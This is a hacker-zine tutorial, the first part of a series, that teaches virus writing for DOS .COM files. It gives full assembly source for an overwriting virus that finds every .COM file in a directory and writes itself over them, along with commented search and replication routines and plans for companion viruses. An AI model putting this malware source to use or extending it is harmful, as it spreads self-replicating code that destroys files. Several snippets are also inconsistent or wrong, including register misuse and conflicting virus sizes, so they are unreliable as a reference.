How to program a VIRUS: Part 1
The last click Issue 2
For those who don't know anything about it, I'll start from the beginning.
What is a virus?
A virus is a program, most often (not always) written in assembler, which has the ability to reproduce itself once executed.
In general, a virus is contained into a program to facilitate its activation and therefore its reproduction. It is designed to go unnoticed during its contamination and replication phase.
A virus must have at least 2 parts:
- one allowing it to search for files to contaminate.
- one allowing it to reproduce itself.
We can then add other routines (parts or sub-parts) such as a destructive load, a triggering module, ...
Of course, viruses have been around for long time and were originally designed to infect .COM files dating back to the CP/M era.
Today, viruses attacking Windows .EXE files or macro viruses and other Worms viruses... are much more complex in their writing.
However, some mechanisms remain the same.
To start with, we will study some simple .COM infectors. Try to find a book on assembler in parallel to this course. You will also need an assembler. I recommend TASM.
Simple COM infector virus
It is better to start with a very small virus which will be easy to understand and not too dangerous in case of escape...
This is a simple non-memory resident COM infector with non-destructive 80X86 code.
Among COM infectors there are overlapping viruses, companion viruses and parasitic viruses, but we'll see that later.
Let's see already how a .COM program works.
At the DOS prompt, when you type the name of a .COM program, DOS looks for a program with that name and the .COM extension. If it finds it, it loads it into RAM and executes it. If not, it looks for an .EXE with the same name, then for a .BAT file.
COM programs are the simplest of all CPU programs. Their segment format is predefined in DOS. A COM program can only use one segment, i.e. 64KB. The COM file is loaded into the segment at offset 100h, while DOS creates a program segment prefix from address 0 to 0FFh.
This is where our virus comes in.
1. the overlay virus
It's simple and it's crap, because once a program is contaminated, it's destroyed because it's partially overwritten, hence the name overwriting. So there's no way to hide such a virus. It works in the following way:
- the virus is executed.
- It starts its execution in the segment allocated by DOS at offset 100h.
- It searches for all files with "*.COM" mask in the current directory.
- It opens each file found and writes its code at the beginning.
- It returns control to DOS.
The infected program is then screwed, and when you run it, it is actually the virus code that is executed.
Here is the source of such a virus:
A virus of about 50 bytes that rewrites all the COM's files of a directory.
.model small
.code
FNOM EQU 9EH ;Search function, result.
org 100H
START:
mov ah,4EH ;Search for COM files (SF)
mov dx,OFFSET COM_FILE
int 21H
SEARCH:
jc DONE
mov ax,3D01H ;Opens the file found.
mov dx,FNOM
int 21H
xchg ax,bx ;Writes the virus to the file.
mov ax,40H
mov cl,42 ;Size of the virus.
mov dx,100H ;Location of the virus.
int 21H
mov ah,3EH
int 21H ;Close the file.
mov ah,4FH
int 21H ;Search for a new COM file.
jmp SEARCH
DONE:
ret ;Return control to DOS.
COM_FILE Db '*.COM',0 ;String for COM search.
END START
Voilà. I hope you will understand something. Now let's take a closer look at the search routine.
1.1 Search function
The DOS keeps the information of the files in 2 areas of the disk (FAT). The directory contains a field of 32 bytes which contains the name, date, size, extension and attributes of the files.The FAT is thus a structure of the disk. Each disk contains 2 FATs. The FAT and the Root directory are always located in the same place on all disks.
DOS makes it easy for us to find and open the file we want, by calling the right DOS interrupt and placing the correct values in the CPU registers.
For example,
mov dx,OFFSET FNOM
xor al,al
mov ah,3DH
int 21H
This routine opens a file whose name is stored in FNOM.
It is the same for groups of files or directories. It is enough to declare a directory or a name with the syntax:
Db 'Chemin\nom_de_fichier.ext'
Of course, the character * and ? are wildcards as in the DOS prompt.
We are going to look for a first .COM file then, if we find one, we look for a second one ...
We will use for that a first search function, then a second one for the following files.
The first routine looks like this:
CH_UN:
mov dx,OFFSET FICHCOM ;which points to the string '*.COM'.
mov ah,4EH ;First search function
int 21H ;calls DOS.
jc PASFICH ;if no file found
FIND: ;Jump here if file found
FICHCOM Db '*.COM',0 ;ASCII string
If the first search gives a result, the second search is called. It is much simpler because the parameters have been fixed before.
mov ax,4FH
int 21h
jc PASFICH
FIND2:
1.2 Replication function
We have seen how the virus finds its host program. Now, its code must open the host and then write its code into the host program, overwriting it since it is an overlay virus.
To open the host, the virus uses the 3Dh function of the 21h interrupt. The access rights are specified in the al register which takes the value 1 (write only). DX:DS points to the file found whose name is stored in FNOM at address 9EH.
The code is therefore as follows:
mov ax,3D01H
mov dx OFFSET FNOM
int 21H
DOS then returns an identification number of the file in ax, which must be placed in bx for all manipulations, so we use the instruction "mov bx,ax".
Then, the virus calls the 40H function of int 21h to copy its code. It is ds:dx that points to the place where the data will be written. Here the position is ds:100h since the code is written at the beginning of the file (overlay). Here cx carries the number of bytes to be written, and dx points to the data to be written. we get the following code:
mov bx,ax
mov dx,100h
mov cx,44
mov ah,40h
int 21h
You will notice that this code is very simple, both in its structure and in its execution. Obviously, it is not very powerful, but it is only 45 bytes long, which is very little. The main defect of this type of virus (recovery) is that it destroys everything it infects and therefore can not go unnoticed for long.
If you run this virus, you just have to run the programs in the same directory to know if they are infected, then you just have to delete them and replace them with a backup to get back a healthy directory.
The next part will be devoted to simple companion viruses infecting .COM
-=Shin=-